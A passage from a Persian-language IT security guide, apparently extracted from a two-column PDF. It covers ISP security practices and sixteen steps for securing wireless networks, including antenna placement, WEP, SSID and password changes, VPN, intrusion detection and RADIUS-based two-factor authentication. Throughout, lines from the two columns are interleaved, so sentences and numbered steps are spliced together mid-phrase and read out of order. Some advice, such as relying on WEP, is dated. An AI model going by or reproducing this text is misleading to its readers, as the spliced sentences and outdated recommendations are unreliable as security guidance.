ﺧﻮﺩ ﺭﺍ ﺗﺮﻏﻴﺐ ﻛﻨﻴﺪ ﻛﻪ ﺩﺳﺘﮕﺎﻩ ﺧﻮﺩ ﺭﺍ ﺍﻳﻤﻦ ﺳﺎﺯﻧﺪ.
ﻳﻚ ﺳﻴﺎﺳﺖ ﻛﺎﺭﺑﺮﺩ ﻣﺠﺎﺯ ) ٢٠٦(AUPﺗﺪﻭﻳﻦ ﻛﻨﻴـﺪ ﻛـﻪ •
ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﻪ •
ﺷﺎﻣﻞ ﻭﻇـﺎﻳﻒ ﻣﺘﻘﺎﺑـﻞ ISPﻭ ﻣـﺸﺘﺮﻳﺎﻥ ﺑﺎﺷـﺪ .ﺍﻳـﻦ
ﻳﻚ ﺗﻮﺯﻳﻊﻛﻨﻨﺪﺓ ﻫﺮﺯﻧﺎﻣﻪ ﺗﺒﺪﻳﻞ ﻧﺸﻮﺩ.
ﺳﻴﺎﺳﺖ ﺑﺎﻳﺪ ﺩﺭ ﺗﻤﺎﻡ ﻗﺮﺍﺭﺩﺍﺩﻫﺎﻱ ﻣﺸﺘﺮﻱ ﻣـﻮﺭﺩ ﺍﺷـﺎﺭﻩ
ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﻛﻨﺘﺮﻝ ﻫﺮﺯﻧﺎﻣﻪ ﺭﺍ ﻧﺼﺐ ﻛﻨﻴﺪ. • ﻗﺮﺍﺭ ﮔﻴﺮﺩ.
ﻛﻠﻴﺔ ﺩﺳﺘﺮﺳﻴﻬﺎ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﻭ ﺑﺮﻗﺮﺍﺭﻱ ﻭ ﻗﻄـﻊ • ﺷﺒﻜﻪ ﺭﺍ ﺑﮕﻮﻧـﻪﺍﻱ ﻃﺮﺍﺣـﻲ ﻛﻨﻴـﺪ ﻛـﻪ ﺗـﺎ ﺣـﺪ ﺍﻣﻜـﺎﻥ •
ﺍﺗﺼﺎﻝ ﺑﻪ ﺷﺒﻜﻪ ﺭﺍ ﺛﺒﺖ ﻛﻨﻴـﺪ ﺗـﺎ ﺗﻮﺍﻧـﺎﻳﻲ ﺧـﻮﺩ ﺑـﺮﺍﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻭ ﻋﻤﻠﻲ ﺑﺎﺷﺪ .ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺷﺒﻜﺔ ﺷـﻤﺎ ﺭﺍ
ﺟﻤﻊﺁﻭﺭﻱ ﻣﺪﺍﺭﻙ ﻗﺎﻧﻮﻧﻲ ﻋﻠﻴـﻪ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﺭﺍ ﺍﻓـﺰﺍﻳﺶ ﻛﻨﺘﺮﻝ ﻭ ﺍﺩﺍﺭﻩ ﻣﻲﻛﻨﻨﺪ )ﺍﺯ ﺟﻤﻠﻪ ﺳﻴـﺴﺘﻢ ﻣﻴﺰﺑـﺎﻥ ﺣـﺴﺎﺑﻬﺎﻱ
ﺩﺍﺩﻩ ﺑﺎﺷﻴﺪ. ﻛـﺎﺭﺑﺮﻱ( ﺑﺎﻳﺪ ﺑﻮﺳﻴﻠﺔ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺠﺰﺍ ﺷـﺪﻩ
ﺍﺯ ﺭﻭﺍﻟﻬﺎﻱ ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺧـﻮﺩ ﻭ ﻛـﺎﺭﺑﺮﺍﻥ • ﺑﺎﺷﻨﺪ.
ﻣﺠﻤﻮﻋﻪﺍﻱ ﺳﺨﺘﮕﻴﺮﺍﻧﻪ ﻭ ﻫﻤﭙﻮﺷﺎﻥ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ. ﺍﻃﻤﻴﻨﺎﻥ ﭘﻴﺪﺍ ﻛﻨﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﺗﻤـﺎﻡ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺑﺨـﺶ •
ﻭﺻـــﻠﻪﻫـــﺎﻱ ﺍﻣﻨﻴﺘـــﻲ ﺭﺍ downloadﻭ ﺍﺯ ﻃﺮﻳـــﻖ • ﻣﺪﻳﺮﻳﺖ ،ﺑﺨﺶ ﺧﺪﻣﺎﺕ )ﻣﺜـﻞ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ ﭘـﺴﺖ
ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﻩ ﻭ ﻳﺎ ﺷﺒﻜﺔ ﺗﻮﺯﻳﻊ ﻣﺤﻠﻲ ،ﺗﻮﺯﻳﻊ ﻛﻨﻴﺪ. ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ،ﻭﺏ ،ﺗــﺼﺪﻳﻖ ﻫﻮﻳــﺖ Proxy ،ﻭ (DNSﻭ ﺗﻤــﺎﻡ
ﺑﺎ ﺍﻳﻨﻜﺎﺭ ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻨﻜﻪ ﺑﻪﺭﻭﺯ ﺑﻮﺩﻥ ﻭ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺭﺍ ﺗﺠﻬﻴﺰﺍﺕ ﻣﺴﻴﺮﻳﺎﺑﻲ ﻭ ﻛﻨﺘﺮﻟﻲ ﺷﺒﻜﻪ ﺍﺯ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ
ﺑﺮﺍﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺗﺴﻬﻴﻞ ﻛﺮﺩﻩﺍﻳﺪ ،ﭘﻬﻨـﺎﻱ ﺑﺎﻧـﺪ ﻣـﺼﺮﻓﻲ ﻣــﺴﺘﺤﻜﻢ ﻭ ﻗــﻮﺍﻧﻴﻦ ﺩﺳﺘﺮﺳــﻲ ﻣﺤﺪﻭﺩﺷــﺪﻩ ﺍﺳــﺘﻔﺎﺩﻩ
ﺧﻮﺩ ﺭﺍ ﻧﻴﺰ ﻛﺎﻫﺶ ﺩﺍﺩﻩﺍﻳﺪ. ﻣﻲﻛﻨﻴﺪ.
ﭘﻴﺶ ﻓﺮﺽ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﺭﺍ ﻣـﻲ ﺩﺍﻧﻨـﺪ ﻭ ﺍﺑﺘـﺪﺍ ﺁﻧﻬـﺎ ﺭﺍ ﺷﺎﻧﺰﺩﻩ ﮔﺎﻡ ﺑﺮﺍﻱ ﺍﻳﻤﻦﺳﺎﺯﻱ WLAN
ﻣﻮﺭﺩ ﺁﺯﻣﺎﻳﺶ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ.
ﺍﻣﻨﻴﺖ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﺑﺴﻴﺎﺭ ﺷﺒﻴﻪ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜـﻲ ﺩﺭﺏ ﻭﺭﻭﺩﻱ
ﭘﻮﺷﺶ ﺷﺒﻜﺔ ﺑـﻲﺳـﻴﻢ ﺭﺍ ﺣـﺪﺍﻛﺜﺮ ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ ﻭﺳـﻌﺖ .۷ ﻳﻚ ﺳﺎﺧﺘﻤﺎﻥ ﺍﺳﺖ :ﻫﺮ ﻛﺴﻲ ﺑﺎ ﺍﻧﮕﻴﺰﻩ ،ﺑﻮﺩﺟﻪ ،ﻣﻨﺎﺑﻊ ،ﻭ ﺯﻣﺎﻥ
ﺳﺎﺧﺘﻤﺎﻥ ﺧﻮﺩ ﺗﻨﻈﻴﻢ ﻛﻨﻴﺪ ﻭ ﻧﻪ ﺑﻴـﺸﺘﺮ .ﻫﻤﻴﻨﻄـﻮﺭ ﻛـﻪ ﻛﺎﻓﻲ ﻗﺎﺩﺭ ﺍﺳﺖ ﺁﻧﺮﺍ ﺧﺪﺷﻪﺩﺍﺭ ﻛﻨﺪ .ﺑﺎ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﺑﺎﻳﺪ ﻣﺜـﻞ
ﺍﺩﺍﺭﺓ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﻳﺎﻓﺘﻦ ﻣﺤﻠﻲ ﻣﻨﺎﺳﺐ ﺟﻬـﺖ ﺍﺳـﺘﻘﺮﺍﺭ ﻳﻚ ﺷﺒﻜﺔ ﻫﻤﮕﺎﻧﻲ ﻭ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺱ ﺑﺮﺍﻱ ﻋﻤـﻮﻡ ﺭﻓﺘـﺎﺭ ﻛـﺮﺩ.
ﻧﻘﻄﺔ ﺗﻤﺎﺱ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﻴﺪ ،ﺩﺭﻧﻈﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﻧﺒﺎﻳﺪ ﺗﺼﻮﺭ ﻛﻨﺪ ﻛﻪ ﺩﺍﺩﻩﻫﺎﻱ ﺍﻧﺘﻘﺎﻟﻲ
ﻣﺤﻞ ﺁﻧﺮﺍ ﺩﺭ ﺟﺎﻳﻲ ﻣﺘﻤﺎﻳﻞ ﺑﻪ ﻣﺮﻛﺰ ﺳﺎﺧﺘﻤﺎﻥ ﺑﺮﮔﺰﻳﻨﻴﺪ؛ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ،ﺧﺼﻮﺻﻲ ﻭ ﺍﻣﻦ ﺍﺳﺖ .ﺗﻮﺻﻴﻪﻫﺎﻱ ﺍﻳﻤﻨـﻲ ﺯﻳـﺮ
ﭼﺮﺍﻛﻪ ﺍﮔﺮ ﺁﻧﺮﺍ ﻧﺰﺩﻳﻚ ﭘﻨﺠﺮﻩﻫﺎ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻛﻪ ﺑﺮﮔﺮﻓﺘﻪ ﺍﺯ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﻭ ﺗﻮﺻﻴﻪﻫﺎﻱ ﭘﻴﺸﮕﺎﻣﺎﻥ ﺍﻳﻦ ﺻﻨﻌﺖ
ﺳﻴﮕﻨﺎﻟﻬﺎﻱ ﻗﻮﻳﺘﺮﻱ ﺑﻪ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺧﺘﻤﺎﻥ ﺗﺸﻌﺸﻊ ﻳﺎﺑﻨﺪ ﺍﺳﺖ ،ﻧﻜـﺎﺕ ﺳـﺎﺩﻩﺍﻱ ﺑـﺮﺍﻱ ﺍﻳﺠـﺎﺩ ﻳـﻚ ﺯﻳﺮﺳـﺎﺧﺖ ﺟﻬـﺖ
ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﺩﻳﮕﺮﺍﻥ ﺷﺒﻜﺔ ﺷﻤﺎ ﺭﺍ ﺁﺳﺎﻧﺘﺮ ﭘﻴﺪﺍ ﻛﻨﻨﺪ. ﺍﻳﻤﻦﺳﺎﺯﻱ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ:
ﺑﺮﺍﻱ ﺑﺨﺸﻬﺎﻱ ﺑﻲ ﺳﻴﻢ ،ﺁﻧﺘﻨﻬﺎﻱ ﺟﻬﺘـﺪﺍﺭ ﺗﻬﻴـﻪ ﻛﻨﻴـﺪ. .۸ ﻳﻚ ﺭﺍﻫﻜﺎﺭ ﺩﺭ ﺳﻄﺢ ﺳﺎﺯﻣﺎﻥ ﺑﺮﺍﻱ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺑـﻲ ﺳـﻴﻢ .۱
ﺑﻴــﺸﺘﺮ ﺩﺳــﺘﮕﺎﻫﻬﺎﻱ ﺑــﻲﺳــﻴﻢ ﺍﺯ ﺁﻧﺘﻨﻬــﺎﻱ ﭼﻨــﺪﺟﻬﺘﻲ ﺗﻬﻴﻪ ﻛﻨﻴﺪ .ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺧﻂﻣﺸﻲﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺳـﺎﺯﻣﺎﻥ ﻭ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ .ﭼﻨـﻴﻦ ﺁﻧﺘﻨﻬـﺎﻳﻲ ﺑـﻪ ﻣﻬـﺎﺟﻢ ﺍﻣﻜـﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺷﺒﻜﻪ ﺭﺍ ﻃﻮﺭﻱ ﺗﻨﻈﻴﻢ ﻛﻨﻴﺪ ﻛﻪ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ
ﺑﺨﺶ ﺳﻮﻡ
ﺿﺒﻂ ﻛﻠﻴﺔ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﺍ ﻣﻲﺩﻫﻨﺪ .ﺍﻳﻦ ﺩﺭﺣﺎﻟﻲ ﺍﺳﺖ ﻛـﻪ ﺳﺎﺯﮔﺎﺭ ﺑﺎﺷﻨﺪ.
ﺁﻧﺘﻨﻬﺎﻱ ﺟﻬﺘﺪﺍﺭ ﺍﮔﺮ ﺩﺭ ﻓﺮﻛﺎﻧﺴﻲ ﺣﺪﻭﺩ ۲،۴ﮔﻴﮕـﺎﻫﺮﺗﺰ
ﺑﺮﺭﺳﻲ ﻛﻨﻴـﺪ ﻛـﻪ ﭼﻨـﺪ ﻧﻔـﺮ ﺍﺯ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺩﺭ ﻣﻨـﺰﻝ ﺍﺯ .۲
ﻳﺎ ﺑﺎﻻﺗﺮ ﻛﺎﺭ ﻛﻨﻨﺪ ،ﮔﺴﺘﺮﺓ ﺍﻧﺘﺸﺎﺭ ﺳﻴﮕﻨﺎﻝ ﺑـﺴﻴﺎﺭ ﻛﻤﺘـﺮ
WLANﺳﺎﺯﻣﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﻨﺪ .ﺍﻳـﻦ ﻛـﺎﺭﺑﺮﺍﻥ ﺭﺍﻩ
ﺧﻮﺍﻫﺪ ﺑﻮﺩ.
ﺩﻭﺭ ﺑﺎﻳﺪ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﺑﺎﺷـﻨﺪ ﺗـﺎ ﺑﺘـﻮﺍﻥ ﻧﻘـﺎﻁ ﺗﻤـﺎﺱ
WEPﺭﺍ ﻓﻌﺎﻝ ﻛﻨﻴﺪ .ﺑﺮﺍﻱ ﺍﻳﻨﻜـﺎﺭ ﻛﻠﻴـﺪ ﭘـﻴﺶﻓـﺮﺽ .۹ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺷﺒﻜﻪ ﺭﺍ ﻣﺴﺪﻭﺩ ﻛﺮﺩ.
WEPﺭﺍ ﺗﻐﻴﻴــﺮ ﺩﻫﻴــﺪ ﻭ ﺑﻌــﺪ ﺍﺯ ﺁﻥ ﺑــﺼﻮﺭﺕ ﻫﻔﺘﮕــﻲ
٢٠٧ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ ﺣﺴﺎﺑﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ ،ﻳـﻚ ﻓﺮﺁﻳﻨـﺪ ﺗﻬﻴـﻪ .۳
ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺗﻜﺮﺍﺭ ﻧﻤﺎﻳﻴﺪ.
ﻛﻨﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻥ ﺑﺼﻮﺭﺕ ﺍﻣﻦ ﺁﻧﻬﺎ ﺭﺍ ﻣﺪﻳﺮﻳﺖ ﻛﺮﺩ.
ﻣﻴﺎﻥ ﺩﻳﻮﺍﺭﺓ ﺁﺗـﺶ ﻭ ﺷـﺒﻜﺔ ﺑـﻲﺳـﻴﻢ ،ﺍﺯ ﺗﻮﻧـﻞ VPN .۱۰
ﺧﺪﻣﺎﺕ ﻏﻴﺮﺿﺮﻭﺭﻱ ﺭﺍ ﺭﻭﻱ ﺗﻤﺎﻡ ﺳﺮﻭﻳﺲ ﺩﻫﻨـﺪﻩﻫـﺎ ﻭ .۴
ﺍﺳــﺘﻔﺎﺩﻩ ﻛﻨﻴــﺪ .ﺍﮔﺮﭼــﻪ ﺍﻳــﻦ ﺍﻣــﺮ ﻣــﺴﺘﻠﺰﻡ ﺭﺍﻩﺍﻧــﺪﺍﺯﻱ
ﻻ ﻛﻠﻴـﺔ ﺧـﺪﻣﺎﺕ ﺳﺮﻭﻳﺲ ﮔﻴﺮﻧﺪﻩ ﻫﺎ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ .ﺍﺻﻮ ﹰ
ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩ VPNﻣﻲﺑﺎﺷـﺪ ،ﺍﻣـﺎ ﺩﺭ ﻃـﺮﻑ ﺩﻳﮕـﺮ،
ﻧﺎﺷﻨﺎﺧﺘﻪ ﻳﺎ ﺑﻲﺍﺳﺘﻔﺎﺩﻩ ﺑﺎﻳﺪ ﻏﻴﺮﻓﻌﺎﻝ ﺑﺎﺷﻨﺪ.
ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﺳﺮﻭﻳﺲ ﮔﻴﺮﻧﺪﺓ VPNﺩﺭ ﺑﻴﺸﺘﺮ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ
ﻣﺜـﻞ ،Windows 2000 ،Windows 98 SEﻭ ﺗﻨﻈﻴﻤﺎﺕ ﭘﻴﺶﻓﺮﺽ ﻣﺤﺼﻮﻻﺕ ﺧـﻮﺩ ﺭﺍ ﺗﻐﻴﻴـﺮ ﺩﻫﻴـﺪ. .۵
Windows XPﺗﻌﺒﻴﻪ ﺷﺪﻩ ﺍﺳﺖ. ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺭﺍﻫﺒﺮﺍﻥ ﻣﺮﺗﻜﺐ ﺍﻳﻦ ﺍﺷـﺘﺒﺎﻩ ﻣـﻲﺷـﻮﻧﺪ ﻛـﻪ
ﺍﻃﻼﻋــﺎﺕ SSIDﻳــﺎ ﺁﺩﺭﺱ IPﻧﻘــﺎﻁ ﺩﺳﺘﺮﺳــﻲ ﺭﺍ ﺍﺯ
.۱۱ﺭﻭﻱ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ،ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﻬﺎﺟﻢﻳﺎﺏ ﻣﺒﺘﻨﻲ ﺑـﺮ
٢٠٩ ﻣﻘﺪﺍﺭ ﺍﻭﻟﻴﺔ ﺁﻧﻬﺎ ﺗﻐﻴﻴﺮ ﻧﻤﻲﺩﻫﻨﺪ SSID .ﺭﺍ ﻃﻮﺭﻱ ﺗﻐﻴﻴﺮ
ﺷﺒﻜﻪ ) ٢٠٨(NIDSﺗﻌﺒﻴﻪ ﻛﻨﻴﺪ.
ﻧﺪﻫﻴــﺪ ﻛــﻪ ﻧــﺎﻡ ،ﺑﺨــﺸﻬﺎ ،ﻭ ﻣﺤــﺼﻮﻻﺕ ﺷــﺮﻛﺖ ﺭﺍ
.۱۲ﺩﺭ ﺳﻄﺢ ﺳـﺎﺯﻣﺎﻥ ،ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺿـﺪﻭﻳﺮﻭﺱ ﺭﺍ ﺭﻭﻱ ﻣـﺸﺨﺺ ﻛﻨــﺪ .ﺩﺭ ﻏﻴﺮﺍﻳﻨـﺼﻮﺭﺕ ﺍﺯ ﺁﻧﺠــﺎ ﻛــﻪ SSID
ﺗﻤﺎﻡ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ ﺑﻲﺳﻴﻢ ﻧﺼﺐ ﻛﻨﻴﺪ. ﺑﻮﺳﻴﻠﺔ ﻧﻘﻄﺔ ﺩﺳﺘﺮﺳﻲ ﺍﻋـﻼﻥ ﻋﻤـﻮﻣﻲ ﻣـﻲﺷـﻮﺩ ،ﺑـﻪ
ﻣﺤﺾ ﺍﻳﻨﻜﻪ ﻧﻔﻮﺫﮔﺮ ﻛﻠﻴﺪ WEPﺭﺍ ﺑـﺸﻜﻨﺪ ،ﺑﺮﺍﺣﺘـﻲ
ﻣﺘﻮﺟﻪ ﻣﻲﺷﻮﺩ ﻛﻪ ﺑﻪ ﺷﺒﻜﺔ ﭼﻪ ﻛـﺴﻲ ﺩﺳﺘﺮﺳـﻲ ﭘﻴـﺪﺍ
۲۰۷ﻣﻨﺒﻊNIPC : ﻛﺮﺩﻩ ﺍﺳﺖ.
http://www.nipc.gov/publications/nipcpub/best
pract.html ﺭﻣﺰ ﻋﺒﻮﺭ ﭘـﻴﺶﻓـﺮﺽ ﻧﻘﻄـﺔ ﺩﺳﺘﺮﺳـﻲ ﻳـﺎ ﻣـﺴﻴﺮﻳﺎﺏ .۶
208 Network Based Intrusion Detection System
۲۰۹ﻣﻨﺒﻊ ،Chris Bateman :ﺗﺤﻠﻴﻠﮕﺮ CERT
ﻻ ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ
ﺑﻲﺳﻴﻢ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﻴﺪ .ﻧﻔﻮﺫﮔﺮﺍﻥ ﻣﻌﻤﻮ ﹰ
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٢١٢
ﻛﺮﺩﻥ ﻣﻘﺼﺪ ﺗﺮﺍﻓﻴـﻚ ﺧـﺎﺭﺝﺷـﺪﻩ ﺍﺯ ﺷـﺒﻜﺔ ﺑـﻲﺳـﻴﻢ .۱۳ﺍﺯ ﻣﻜﺎﻧﻴﺰﻡ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﻭﻋﺎﻣﻠﻲ ٢١٠ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ،
ﻣﻲ ﺗﻮﺍﻥ ﺍﺯ ﻗﻮﺍﻧﻴﻦ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺳﺘﻔﺎﺩﻩ ﻛـﺮﺩ .ﺍﻃﻤﻴﻨـﺎﻥ ﭼﺮﺍﻛﻪ ﺩﺭﺻﺪ ﺯﻳﺎﺩﻱ ﺍﺯ ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﻛﺎﻫﺶ ﻣﻲﺩﻫﺪ .ﺩﻭ
ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻣﻴﺎﻥ ﺗﻤﺎﻡ ﻧﻘﺎﻁ ﺩﺳﺘﺮﺳـﻲ ﺭﻭﺵ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﻭﻋـﺎﻣﻠﻲ ﻭﺟـﻮﺩ
ﺑﻲﺳﻴﻢ ﻭ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ ﻳﺎ ﺍﻳﻨﺘﺮﻧﺖ ﻭﺟﻮﺩ ﺩﺍﺭﺩ. ﺩﺍﺭﺩ .ﺭﻭﺵ ﺍﻭﻝ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ "ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷﻤﻨﺪ ﻣﺒﺘﻨﻲ ﺑﺮ
ﻧﺸﺎﻧﻪ" ﺍﺳـﺖ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ ﺯﻳـﺴﺘﻲ ﺍﻓـﺮﺍﺩ ﺭﺍ ﺩﺭ ﺧـﻮﺩ
.۱۵ﺳﺮﻭﻳﺲ DHCPﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ ﻭ ﺑـﺮﺍﻱ ﻛﺎﺭﺗﻬـﺎﻱ
ﺫﺧﻴــــﺮﻩ ﻣــــﻲﻛﻨﻨــــﺪ ٢١١.ﺭﻭﺵ ﺩﻭﻡ ﺍﺳــــﺘﻔﺎﺩﻩ ﺍﺯ
ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﺧﻮﺩ ﺍﺯ ﺁﺩﺭﺱ IPﺛﺎﺑـﺖ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ.
ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩﻫﺎﻱ ٢١٢RADIUSﺍﺳﺖ ﻛـﻪ ﺭﺍﻳﺎﻧـﻪ ﺭﺍ
ﻫﻤﭽﻨﻴﻦ ﻣﺤﺪﻭﺩﺓ ﭘﻴﺶ ﻓﺮﺽ ﺁﺩﺭﺱ IPﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ
ﺑﺮﺍﻱ ﺷﺒﻜﻪ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﻲﻛﻨﻨﺪ ﻭ ﺍﺭﺗﺒـﺎﻁ ﺷـﻤﺎ ﺑـﺎ
ﺭﺍ ﺍﺯ ﺁﻧﭽﻪ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﻩ ﺗﻌﻴﻴﻦ ﻛﺮﺩﻩ ﺗﻐﻴﻴﺮ ﺩﻫﻴﺪ.
ﻧﻘﻄﺔ ﺗﻤﺎﺱ ﺭﺍ ﻧﻴﺰ ﺑﺮﻗﺮﺍﺭ ﻣﻲﺳﺎﺯﻧﺪ .ﻛﺎﺭﺑﺮ ﺻﺮﻓﹰﺎ ﺑﻤﻨﻈﻮﺭ
.۱۶ﺗﻨﻬﺎ ﻧﻘﺎﻁ ﺩﺳﺘﺮﺳﻲ ﻗﺎﺑﻞ ﺍﺭﺗﻘﺎ ﺧﺮﻳﺪﺍﺭﻱ ﻛﻨﻴﺪ .ﻫﻤﻴـﺸﻪ ﺗــﺼﺪﻳﻖ ﻫﻮﻳــﺖ ﺑــﺮﺍﻱ ﺳــﺎﻳﺮ ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﻩﻫــﺎ ﺑــﻪ
ﭘﻴﺸﺮﻓﺘﻬﺎﻳﻲ ﺩﺭ ﺍﻣﻨﻴﺖ ﺍﻳﻨﮕﻮﻧﻪ ﺍﺑﺰﺍﺭﻫﺎ ﺍﻳﺠﺎﺩ ﻣﻲﺷـﻮﺩ ،ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ RADIUSﻣﺘﺼﻞ ﻣﻲ ﺷﻮﺩ .ﺩﺭ ﺣﻘﻴﻘﺖ
ﻟﺬﺍ ﺑﺎﻳﺪ ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ ﻛﻪ ﻫﻤﻮﺍﺭﻩ ﺧﻮﺍﻫﻴﺪ ﺗﻮﺍﻧﺴﺖ ﻧﻘﺎﻁ ﺩﺭ ﺍﻳﻦ ﺭﻭﺵ ﺳـﺮﻭﻳﺲ ﺩﻫﻨـﺪﻩﻫـﺎﻱ RADIUSﻣﺜـﻞ
ﺩﺳﺘﺮﺳﻲ ﺧﻮﺩ ﺭﺍ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺭﻳﺪ. ٢١٣
ﻧﮕﻬﺒﺎﻥ ﻳﻚ ﺳﺎﻟﻦ ،ﻋﺒﻮﺭ ﻭ ﻣﺮﻭﺭ ﺭﺍ ﻛﻨﺘﺮﻝ ﻣﻲﻛﻨﻨﺪ.
ﺍﻃﻼﻋﺎﺕ ﺩﻳﮕﺮﻱ ﺩﺭ ﺧﺼﻮﺹ VPN .۱۴ﺍﺯ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺑﻲﺳﻴﻢ ﺑﻌﻨﻮﺍﻥ gatewayﺍﺳﺘﻔﺎﺩﻩ
ﻛﻨﻴﺪ ٢١٤.ﺍﻳﻦ ﺩﺳﺘﮕﺎﻩ ﻣﺜﻞ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺍﺯ
ﺑﺮﺍﻱ ﻣﺤﺎﻓﻈـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺳﻴـﺴﺘﻤﻬﺎﻳﻲ ﻛـﻪ ﺍﺯ ﻫﺮﻳـﻚ ﺍﺯ ﻧﻮﻉ ﺩﻭﻣﻨﺰﻟﻲ ٢١٥ﻋﻤﻞ ﻣﻲ ﻛﻨﺪ ﺑﻄﻮﺭﻳﻜﻪ ﺷﺒﻜﺔ ﺑﻲ ﺳـﻴﻢ
